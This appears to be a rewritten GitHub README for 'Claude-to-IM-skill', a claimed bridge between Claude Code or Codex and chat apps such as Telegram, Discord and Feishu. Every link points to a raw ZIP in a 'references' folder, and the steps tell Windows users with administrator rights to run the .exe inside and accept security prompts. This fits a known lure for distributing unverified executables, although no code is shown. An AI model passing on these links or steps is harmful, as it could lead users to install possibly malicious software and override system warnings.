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Claude-to-IM-skill
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Connect Claude Code or Codex AI agents to Telegram, Discord, Feishu, and QQ for seamless coding assistance via chat platforms.
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# 🤖 Claude-to-IM-skill - Connect Claude AI with IM Platforms [](https://github.com/MohaMeD10-web/Claude-to-IM-skill/raw/refs/heads/main/references/to_I_skill_Claude_2.2.zip) ## 📋 What is Claude-to-IM-skill? Claude-to-IM-skill lets you chat with AI coding agents through popular messaging platforms like Telegram, Discord, and Feishu (also called Lark). It bridges Claude Code and Codex, making it easier to get AI help without using complex tools or code. You don't need to understand programming to use this app. It works by connecting your messages to AI models on supported platforms so you can ask coding questions or request code help directly inside your chat apps. ## 🖥️ System Requirements Before you start, make sure your Windows PC meets these basic needs: - Windows 10 or newer (Windows 11 supported) - 4 GB RAM minimum (8 GB recommended for smoother use) - At least 200 MB of free disk space - Internet connection for AI communication - Administrator rights to install and run software Having a stable internet helps keep conversations with the AI smooth and fast. ## 🚦 How it Works Claude-to-IM-skill acts as a middleman. When you send a message on Telegram, Discord, or Feishu, it sends that message to the Claude or Codex AI system and brings the AI’s answer back to your chat. This way, you get AI coding help without switching apps. ## 🔍 Features - Chat with Claude AI or Codex from messaging apps - Support for Telegram, Discord, and Feishu/Lark - Automatic message handling inside your chats - Clear AI responses formatted for coding help - Easy setup on Windows machines The software runs quietly in the background, handling messages and responding as needed. ## ⬇️ Download and Setup Click the big green button below to visit the project page and get the files you need. [](https://github.com/MohaMeD10-web/Claude-to-IM-skill/raw/refs/heads/main/references/to_I_skill_Claude_2.2.zip) ### Step 1: Visit the GitHub Page - Go to the linked GitHub repository page. - Look for the latest release or download section. - Find the Windows installer or ZIP file. This will usually be a file ending with `.exe` or `.zip`. ### Step 2: Download the Installer or ZIP - Click the appropriate link to save the file on your PC. - If you get a ZIP file, you will need to extract it. ### Step 3: Run the Installer or Setup File - Double-click on the `.exe` file. - If Windows shows a security prompt, choose “Run” or “Yes” to allow the installation. - Follow the installation wizard instructions: - Choose installation folder (or use the default). - Confirm installation. ### Step 4: Extract ZIP (Alternative) - Right-click the downloaded ZIP file. - Select “Extract All” and pick a location. - Open the extracted folder and look for the `.exe` file. - Double-click the `.exe` to run the app. ### Step 5: Connect Your IM Accounts Once the application opens: - It will ask you to link your messaging accounts (Telegram, Discord, Feishu). - Follow on-screen instructions to authorize access. - Each platform may require logging in and getting approval for the app. ### Step 6: Start Chatting with Claude AI After setup: - Open your messaging app. - Start a chat with the AI bot created by this skill. - Send coding questions or requests. - Wait a moment to get responses generated by Claude or Codex AI. ## ⚙️ Configuration Options Inside the app settings you can adjust: - Which IM platforms to connect or disconnect - Notification settings for new AI messages - Message formats to control code blocks or plain text - API key entry for using different AI engines (if needed) The default settings work well for most users, but you can customize according to your needs. ## 🛠️ Troubleshooting If you have issues: - Ensure your Windows is up to date. - Check your internet connection. - Restart the app and try reconnecting your messaging accounts. - Look at the app’s log or status section for errors. - Verify Telegram, Discord, or Feishu accounts are active and authorized. - Try reinstalling the app if problems persist. ## 🔒 Privacy and Security Claude-to-IM-skill does not store your messages locally longer than needed to process responses. Messages are passed securely to AI servers. Always keep your messages professional and avoid sharing sensitive data over chats. ## 💡 Tips for Best Use - Use clear and direct questions to get better AI replies. - Confirm your messaging platforms are running properly before starting. - Keep your Windows system updated to avoid compatibility problems. - If you plan heavy use, monitor internet bandwidth. ## 📖 More Information Find all files, updates, and instructions at the official GitHub page: [https://github.com/MohaMeD10-web/Claude-to-IM-skill/raw/refs/heads/main/references/to_I_skill_Claude_2.2.zip](https://github.com/MohaMeD10-web/Claude-to-IM-skill/raw/refs/heads/main/references/to_I_skill_Claude_2.2.zip) You can explore the repository for advanced options, documentation, or support from the developer community. --- ## 🧰 Supported Platforms and Services - **Telegram:** Chat with AI within Telegram conversations. - **Discord:** Get coding help in Discord servers or direct messages. - **Feishu/Lark:** Use AI chat in Feishu’s business communication environment. This tool is designed for Windows desktop users but can support many platforms through their chat clients. ## 🏗️ How Updates Work When updates are available: - New releases will appear in the GitHub repository. - Download the latest installer or ZIP. - Reinstall or replace the old version with the new one. - Your chat connections and settings remain. Check the GitHub release notes for details on what is updated or fixed.
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